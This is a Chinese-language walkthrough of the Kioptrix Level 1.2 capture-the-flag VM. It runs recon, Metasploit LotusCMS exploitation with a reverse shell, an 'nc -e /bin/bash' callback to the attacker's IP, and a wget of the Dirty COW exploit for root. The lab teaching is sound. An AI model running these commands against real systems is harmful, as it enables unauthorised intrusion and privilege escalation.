VULNHUB-KIOPTRIX: LEVEL 1.2

# KIOPTRIX: LEVEL 1.2 :::spoiler [靶機簡介](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) :::info **About Release** Name: Kioptrix: Level 1.2 (#3) Date release: 18 Apr 2011 Author: Kioptrix Series: Kioptrix Web page: http://www.kioptrix.com/blog/?p=358 **Download** KVM3.rar (Size: 442 MB) Download: http://www.kioptrix.com/dlvm/KVM3.rar Download (Mirror): https://download.vulnhub.com/kioptrix/KVM3.rar **Description** It's been a while since the last Kioptrix VM challenge. Life keeps getting the way of these things you know. After the seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges. I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated. As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still being the realm of the beginner I must add. The same as the others, there’s more then one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to ones own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks… Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this: ``` # localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost127.0.0.1 static3.cdn.ubi.com ``` 192.168.1.102 kioptrix3.com Under Linux that would be /etc/hosts There’s a web application involved, so to have everything nice and properly displayed you really need to this. Hope you enjoy Kioptrix VM Level 1.2 challenge. 452 Megs MD5 Hash : d324ffadd8e3efc1f96447eec51901f2 Have fun Source: http://www.kioptrix.com/blog/?p=358 **File Information** Filename: KVM3.rar File size: 442 MB MD5: D324FFADD8E3EFC1F96447EEC51901F2 SHA1: 121348AA8DD5F83640145D4F8E042C8DE0A78F3F **Virtual Machine** Format: Virtual Machine (VMware) Operating System: Linux **Networking** DHCP service: Enabled IP address: Automatically assign ::: **前置工作** * 匯入 VMware * 虛擬機配置不同網路-Bridged([網路](https://blog.csdn.net/Attsky/article/details/109320325)、[IP](https://blog.csdn.net/qq1069380146/article/details/111995334)) ![image](https://hackmd.io/_uploads/BkJ6mp_tp.png =80%x) ![image](https://hackmd.io/_uploads/rJOQumtKT.png =80%x) * [教學影片](https://youtu.be/KgG-r32jvDc?si=M1Ho6yPDYaliLqOU) ![image](https://hackmd.io/_uploads/B1pNd8z5p.png =80%x) ## 步驟一、搜索目標查找自己IP。`ifconfig`。自己IP為`192.168.0.8`。 ![image](https://hackmd.io/_uploads/Bkq9uUz9a.png =80%x) 搜索靶機IP。`sudo netdiscover -r 192.168.0.0/24`。 ![image](https://hackmd.io/_uploads/Hk2qt8fca.png =80%x) 目標為`192.168.0.10`。 nmap掃其服務`sudo nmap -A -T4 192.168.0.10`。 ![image](https://hackmd.io/_uploads/By6Vq8M5T.png =80%x) 其http有網頁服務。`http://192.168.0.10/`。 `whatweb 192.168.0.10`。觀察其中含有`HTTPServer`。 ![image](https://hackmd.io/_uploads/HyswZvG96.png =80%x) 在Blog中觀察到有`http://kioptrix3.com/gallery`。在Login中使用普通 SQL Injection 手法進不去。 ![image](https://hackmd.io/_uploads/SJzk4PM5a.png) 觀察登入處最下方有`Proudly Powered by: LotusCMS`。 ## 步驟二、針對其服務探索 `searchsploit LotusCMS`。 ![image](https://hackmd.io/_uploads/BJZuSvMcp.png =80%x) ``` msfconsole -q search Lotus search LotusCMS ``` ![image](https://hackmd.io/_uploads/r1HUIvz9p.png) ``` use 0 set payload generic/shell_reverse_tcp show options ``` ![image](https://hackmd.io/_uploads/B1ZxTPzqp.png) ``` set RHOSTS 192.168.0.10 set URI / exploit ``` set URI / 的含義是將模塊的 URI 選項設置為 /。具體而言，用於指定攻擊目標的URI（Uniform Resource Identifier），即指定攻擊目標的路徑或位置。這很重要。 ![image](https://hackmd.io/_uploads/S1SLTDMq6.png) 使用`id`查看身分。 ![image](https://hackmd.io/_uploads/BJl00wGca.png) ## 步驟三、另闢蹊徑取得權限 `uname -a`得到系統 Linux Kernel 版本`2.6.24`。 ![image](https://hackmd.io/_uploads/HJqQZOG5T.png =80%x) `searchsploit Kernel 2.6.24`。 ![image](https://hackmd.io/_uploads/ry-yQ_zca.png =80%x) 其中有一段： `Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c` "Dirty COW" 是一個影響 Linux Kernel 的特權升級漏洞，受影響版本為 2.6.22 到 3.9。漏洞利用了 PTRACE_POKEDATA 的競爭條件，攻擊者可以通過修改內核內存，實現特權升級。攻擊可能利用 `/etc/passwd` 文件，向其中添加具有特權的新用戶。系統管理員應盡快更新 Kernel 以修補此漏洞。提供的 `40839.c` 文件可能是漏洞利用代碼的參考。 `searchsploit -m linux/local/40839.c`。 ![image](https://hackmd.io/_uploads/rkjLXdfqp.png =80%x) `python3 -m http.server`。 ![image](https://hackmd.io/_uploads/B1EkSOf9T.png =80%x) ## 步驟四、建立連線發現其shell跳不到/tmp。 ![image](https://hackmd.io/_uploads/HyowL_zqT.png) 開啟另一個shell。`sudo nc -nlvp 6666`。開啟監聽。在原本Shell輸入`nc -e /bin/bash 192.168.0.8 6666`與另一個shell建立連線。 ![image](https://hackmd.io/_uploads/ryNQuOzcT.png =100%x) ``` python -c 'import pty;pty.spawn("/bin/bash")' ``` `python -c`：啟動 Python 解釋器並運行指定的 Python 代碼。 `'import pty;pty.spawn("/bin/bash")'`：這是一個簡短的 Python 腳本，其中 import pty 導入 pty 模塊，而 pty.spawn("/bin/bash") 則啟動一個交互式的 Bash shell。這個 Python 命令使用 pty 模塊在 Linux 系統中生成一個交互式的 Bash shell。通過執行這條命令，你可以將一個非交互式的 shell 提升為交互式，方便進行進一步的操作。這樣的技巧通常在渗透測試和安全測試中使用，但應僅在合法且得到授權的環境中進行。 ![image](https://hackmd.io/_uploads/SyMTd_zc6.png =100%x) `wget http://192.168.0.8:8000/40839.c`。 ![image](https://hackmd.io/_uploads/Sk14q_Gqa.png =100%x) ## 步驟五、漏洞內容裡面有使用教學。`cat 40839.c`。 ![image](https://hackmd.io/_uploads/H1M0qOf5p.png =100%x) 按照其敘述。 ``` gcc -pthread 40839.c -o try -lcrypt ls -alh ./try ``` ![image](https://hackmd.io/_uploads/Bk6w6dG9p.png =100%x) ## 步驟六、取得權限 ``` su - firefart #輸入密碼 id whoami ``` ![image](https://hackmd.io/_uploads/BJyDAOM9a.png =100%x)